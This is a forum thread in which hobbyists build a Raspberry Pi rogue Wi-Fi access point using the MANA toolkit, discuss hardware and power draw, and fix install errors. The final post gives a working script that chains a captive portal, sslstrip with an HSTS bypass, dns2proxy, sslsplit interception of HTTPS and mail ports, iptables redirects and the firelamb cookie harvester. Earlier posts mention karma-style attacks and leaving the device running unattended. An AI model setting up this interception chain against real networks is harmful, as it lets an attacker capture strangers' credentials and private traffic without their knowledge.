OmDxEz4.jpg

http://i.imgur.com/xQuF9Fq.jpg

http://i.imgur.com/RAtlIVl.jpg

awus036nha

v5 anker 15000 mah

raspberry pi b+

2 amp usb hub

im at about 135$ so far (money i have made with tips during work hours)

i had the pi plugged into 1amp and usb-hub+alfa-card plugged into 2 amp power supply and seems to run just fine... (fails other way around, alfa card needs 2 amps or disconnect/reconnect happens)

the video above, i add this to my /etc/rc.local --> ./mana/run-mana/start-noupstream.sh

with eth0 as the out interface, i have seen this thing go for 12 hours with out any dmesg errors... (./start-nat-simple.sh)

i plan to get a nother alfa card for a good out interface...

its ugly, at the moment, i plan to clean it up...

Nice one! I find it funny that you chose to use a Lego-made case for the Pi.

Um... The Alpha card takes two amps of power?? That would mean the card is burning through 10W... Are you sure about that? Doesn't that cause all sorts of cooling problems?

Well, maybe during heavy load it seems to draw more then 1.2amp... the b+ cant supply enough power for this alfa card.

(Testing the karma like attacks)

Hi i8igmac, how can you make mana-toolkit works on raspberry? I've try many time and get errors.

My raspberry run Kalilinux for arm. (I tested mana-toolkit on my laptop-kali1.09 and it's work!)

Thanks!

I had reinstalled mana-toolkit, but it have an error when run dns2proxy.py

root@kali:/usr/share/mana-toolkit/sslstrip-hsts# python2.6 dns2proxy.py
Traceback (most recent call last):
  File "dns2proxy.py", line 23, in <module>
    import pcapy
ImportError: /usr/lib/python2.6/pcapy.so: cannot open shared object file: No such file or directory

I check the directory /usr/lib/python2.6/, have pcapy.so already.

I don't know what's wrong here. Anybody met same problem? Please let me know how to fix it. Thanks!

Apt-get install kali-linux-wireless

this is a large install. it may cover some of the basic modules you may be missing. on my first boot up this was my first install

then git clone worked with no errors during /mana/kali-install.sh

There is also apt-get install mana-toolkit but you will be missing the bash scripts

you can also search for the specific module through apt

Edited by i8igmac

Apt-get install kali-linux-wireless

this is a large install. it may cover some of the basic modules you may be missing. on my first boot up this was my first install

then git clone worked with no errors during /mana/kali-install.sh

There is also apt-get install mana-toolkit but you will be missing the bash scripts

you can also search for the specific module through apt

I tried apt-get install kali-linux-wireless and it didn't worked. I got same result.

What's distro of linux you using on Rasp Pi? I try many time but it's not work.

I found what's problem, we must use python2.6 instead python2.7. I don't know what's different, but now everything works!

Thanks @i8igmac

glad to see you up and runnung... what kind of wifi card? Are you using a powered usb hub?

I would constantly watch /var/log/kern.log to try and identify any problems... do you have any usb disconnects?

with full.sh running I have seen 24 hrs with know problem but noupstream.sh acts funny after a while I see dhcp fails to hand out ip (seems like to many clients will trigger this event)

• 2 weeks later...

i8igmac very nice setup, i will keep this in mind when i start purchasing my equipment, i like the lego look to lol

when i am able to build this i might add a separate power source for the alfa card and possibly a solar panel to charge the batteries when needed. maybe set it up so that the solar panel runs everything and charges the batteries during the day, and the batteries run everything at night some how. maybe a photoelectric sensor, might also set it up so it pings my laptop every 30 mins or so and if it doesnt then i know there is an issue, that way i can leave it setup for a few days. ohhhhhh the possibilities......... they seem endless ;) lol

• 2 months later...

This is exactly what iv been looking for! I have all the parts currently sitting on a shelf not doing anything so i think this may be my project over the next week! Can you give me a few tips to start off like are you running kali on the pi and what setup did you need to do get it running on its own like this?

Nice one

first thing how big is your SD card? Depending on how much software you would like to install.

install all the essential Wireless tools... once all the software is installed create a backup of your SD card

installing from the repos can be a time-consuming process, which is why I suggest backing up the sd

Il be loading this onto a 32gb and using config to expand. I just want the captive portal to be running atm and possibly ssl or vpn in to the box to change commands in future.

I had a go at setting this up on my VM using the same wifi card as you and had it up and running doing a full attack in no time. However when i tried to load noupstream.sh i had a an error about Facebook not being there and also I'm left with the default apache "welcome page" how would i go about forwarding this to either google or the portal provided in the www folder?

Many thanks

• 1 month later...

Hi guys,

I've got a Pi running up with the complete setup using mana and nodogsplash and a portal.

There's a trick using nodogsplash and redirection ssl traffic using sslsplitter, because nodogsplash modifies the rulebase of iptables. Checkout the modified config:

#Starting Portal
echo Starting Portal
service apache2 start
nodogsplash -f -c ~/mana/run-mana/spot/nodogsplash-portal.conf &
sleep 5

#SSLStrip with HSTS bypass
cd /usr/share/mana-toolkit/sslstrip-hsts/
python sslstrip.py -l 10080 -a -w /var/www/portals/spot/logs/sslstrip/sslstrip.log&
python dns2proxy.py $phy&
cd -

#SSLSplit
sslsplit -D -Z -S /var/lib/mana-toolkit/sslsplit -c /var/www/portals/spot/cert/spot-secure.crt -k /var/www/portals/spot/cert/spot-secure.key -O -l /var/www/portals/spot/logs/sslsplit/sslsplit-connect.log \
https 0.0.0.0 10443 \
ssl 0.0.0.0 10993 \
tcp 0.0.0.0 10143 \
ssl 0.0.0.0 10995 \
tcp 0.0.0.0 10110 \
ssl 0.0.0.0 10465 \
tcp 0.0.0.0 10025&

iptables -t nat -D PREROUTING 1
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10080
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10443
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10143
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10993
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10465
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10025
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10995
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10110
iptables -t nat -A PREROUTING -i $phy -m mark --mark 0x200/0x700 -j ACCEPT
iptables -t nat -A PREROUTING -i $phy -m mark --mark 0x400/0x700 -j ACCEPT
iptables -t nat -A PREROUTING -i $phy -d 0.0.0.0/0 -p tcp --dport 53 -j ACCEPT
iptables -t nat -A PREROUTING -i $phy -d 0.0.0.0/0 -p udp --dport 53 -j ACCEPT
iptables -t nat -A PREROUTING -i $phy -d 10.0.0.1 -p tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:2050
iptables -t nat -A PREROUTING -i $phy -j ACCEPT

# Start FireLamb
~/mana/run-mana/spot/firelamb.py -i wlan0 -t /var/www/portals/spot/logs/sslsplit/ -s /var/www/portals/spot/logs/sslspl/sslsplit-connect.log&
echo "Hit enter to kill me"
read